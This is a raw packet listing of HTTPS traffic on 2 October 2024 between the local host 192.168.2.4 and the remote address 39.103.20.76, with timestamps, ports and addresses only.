Oct 2, 2024 04:27:23.308967113 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308981895 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.309004068 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.309036016 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.335199118 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.335215092 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.355834961 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.355864048 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.355937004 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.356118917 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.356128931 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.623722076 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.623826027 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.624330997 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.624346018 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.624624968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.624630928 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.960469007 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.960500002 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.960555077 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.960577011 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.960591078 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.960594893 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.960628986 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.960633993 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.960665941 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.960681915 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:24.961186886 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:24.961251974 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.200680971 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.200784922 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.200800896 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.200825930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.200859070 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.200877905 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.201491117 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.201560020 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.201581001 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.201636076 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.202246904 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.202310085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.202773094 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.202836990 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.202858925 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.202917099 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.440733910 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.440834999 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.440902948 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.440959930 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.440990925 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.441049099 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.441359043 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.441438913 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.441802979 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.441869020 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.441884995 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.441950083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.442404032 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.442466974 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.442511082 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.442565918 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.443356991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.443416119 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.443460941 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.443516016 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.443548918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.443599939 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.444330931 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.444403887 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.444416046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.444474936 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.679852009 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.679927111 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.679974079 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.680032015 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.680061102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.680116892 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.680354118 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.680408001 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.680711985 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.680767059 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.680807114 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.680860043 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.680902958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.680960894 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.681276083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.681329966 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.681380033 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.681433916 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.681509018 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.681586027 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.681607008 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.681658983 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.682288885 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.682346106 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.682384968 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.682450056 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.682471037 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.682538986 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.683180094 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.683242083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.683270931 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.683339119 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.683370113 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.683429003 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.683465004 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.683521986 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.684149981 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.684205055 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.684258938 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.684315920 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.684350014 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.684410095 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.684437990 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.684498072 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.685110092 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.685169935 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.685198069 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.685256004 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.767107964 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.767168999 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.767257929 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.767303944 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.767345905 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.767396927 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919066906 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919147015 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919172049 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919229984 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919281960 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919337034 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919411898 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919457912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919523954 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919576883 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919611931 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919665098 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919862032 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919914007 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.919943094 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.919987917 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.920044899 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.920100927 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.920161009 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.920222044 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.920245886 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.920299053 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.920399904 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.920456886 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.920490026 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.920541048 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.920846939 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.920901060 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.921036959 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.921106100 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.921130896 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.921200037 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.921224117 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.921289921 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.921314001 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.921372890 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.921405077 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.921464920 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.921489000 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.921552896 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.922039032 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.922096968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.922146082 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.922200918 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.922240019 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.922293901 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.922333956 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.922390938 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.922430992 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.922481060 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.922516108 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.922610998 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.923830986 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.923883915 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.923955917 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.924015045 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.924060106 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.924118042 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.924127102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.924191952 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.924390078 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.924460888 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.924551964 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.924607038 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:25.924634933 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:25.924694061 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.006690979 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.006762028 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.006782055 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.006838083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.007404089 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.007452965 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.007512093 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.007564068 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.007637978 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.007684946 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.007729053 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.007780075 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.007821083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.007870913 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.007926941 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.007973909 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.008032084 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.008090019 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.008232117 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.008287907 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.008342028 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.008389950 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.008451939 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.008507013 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.008536100 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.008589983 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.008615017 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.008666039 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009105921 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009164095 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009227991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009282112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009336948 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009386063 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009447098 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009501934 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009536028 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009583950 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009628057 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009682894 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.009708881 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.009764910 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.159084082 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.159154892 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.159228086 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.159296989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.159343958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.160540104 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.160552025 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.160568953 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.164979935 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.164988995 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.165003061 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.165113926 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.165117979 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.165128946 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.165235043 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246282101 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246351004 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246352911 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246368885 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246398926 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246414900 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246423960 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246429920 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246459961 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246474028 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246488094 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246493101 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246524096 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246546030 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246558905 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246606112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246613026 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246675014 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246714115 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246764898 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246766090 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246774912 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246808052 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246822119 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246860981 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246902943 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246910095 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246917963 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.246978045 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.246998072 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247054100 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247160912 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247211933 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247212887 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247227907 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247267008 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247278929 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247282982 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247312069 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247329950 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247359037 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247401953 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247409105 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247456074 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247665882 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247720003 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247723103 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247733116 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247771025 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247780085 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247834921 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247847080 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247850895 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247886896 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247886896 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247898102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247946024 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.247947931 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.247956991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248001099 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248009920 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248075962 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248106956 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248136044 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248167992 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248173952 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248187065 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248188972 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248193979 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248236895 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248311043 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248359919 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248364925 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248369932 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248409033 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248416901 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248481989 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248486042 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248513937 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248580933 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248585939 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.248611927 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.248645067 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399569035 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399625063 CEST	443	49738	39.103.20.76	192.168.2.4
